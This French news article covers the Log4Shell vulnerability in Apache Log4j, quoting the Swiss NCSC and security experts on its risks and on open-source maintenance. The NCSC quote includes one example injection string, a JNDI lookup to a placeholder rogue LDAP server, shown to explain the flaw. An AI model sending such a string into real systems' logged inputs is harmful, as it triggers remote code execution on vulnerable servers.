Faille des plus critiques, Log4Shell expose des milliers de services et applications
Log4Shell, une faille zero-day des plus critiques, a été découverte dans la populaire bibliothèque open-source de journalisation Apache Log4j. Cette dernière est utilisée dans des milliers d'applications et services. Des mesures sont à appliquer de toute urgence.
Une faille zero-day d’un niveau critique maximal de 10 sur 10, baptisée Log4Shell, a été identifiée. A l’instar de nombreux spécialistes et centres gouvernementaux d’alerte aux cybermenaces, le Centre national pour la cybersécurité (NCSC) a tiré la sonnette d'alarme concernant cette vulnérabilité touchant la populaire bibliothèque de journalisation Apache Log4j. D'ores et déjà exploitée, la faille peut permettre une exécution de code arbitraire à distance par un attaquant sans qu’il n’ait besoin de s'authentifier.
«La vulnérabilité résulte de la façon dont les messages de journal sont traités par le processeur log4j. Si un attaquant envoie un message spécialement conçu (contenant une chaîne de caractères telle que ${jndi:ldap://rogueldapserver.com/a}), cela peut entraîner le chargement d'une classe de code externe ou la consultation d'un message et l'exécution de ce code, conduisant à une situation connue sous le nom d'exécution de code à distance (RCE)», détaille le NCSC.
Les applications backend également exposées
La vulnérabilité n'expose pas seulement les applications web intégrant Java. «Un attaquant peut potentiellement exploiter un système qui n'est pas directement exposé à l'extérieur mais qui traite simplement les données. Par exemple, un attaquant peut fournir un nom d'utilisateur invalide via une application Internet qui déclenche une erreur avec un journal correspondant sur une application backend vulnérable. En conséquence, l'application backend est compromise», avertit dans un billet de blog David Gugelmann, CEO d’Exeon.
Les risques concernant les différentes versions de Log4j et de Java dépendent de plusieurs facteurs.Toutes les versions de Java ne semblent pas être affectées dans leurs configurations par défaut. Il est néanmoins important que les entreprises obtiennent une d'ensemble des systèmes et des logiciels utilisant Log4j dans leur environnement, afin de déterminer les mesures à prendre. De nombreux fournisseurs tiers utilisent Log4j dans leurs produits et publient progressivement des correctifs.
Les actions à entreprendre sont expliquées en détail dans cet article du NCSC.
La problème de la dépendances à l’open source
Plusieurs experts en cybersécurité font observer que la bibliothèque de journalisation Apache Log4j n’est maintenue que par trois bénévoles. «Ceci peut remettre en cause certaines dépendances à des projets open sources», analyse Steven Meyer, de la société romande ZENData. A ses yeux, les grandes entreprises du numérique telles que les GAFAM, qui dépendent de projets open source comme Log4j, devraient prendre une certaine responsabilité pour tester le code et soutenir (financièrement et techniquement) les développeurs de ces projets.
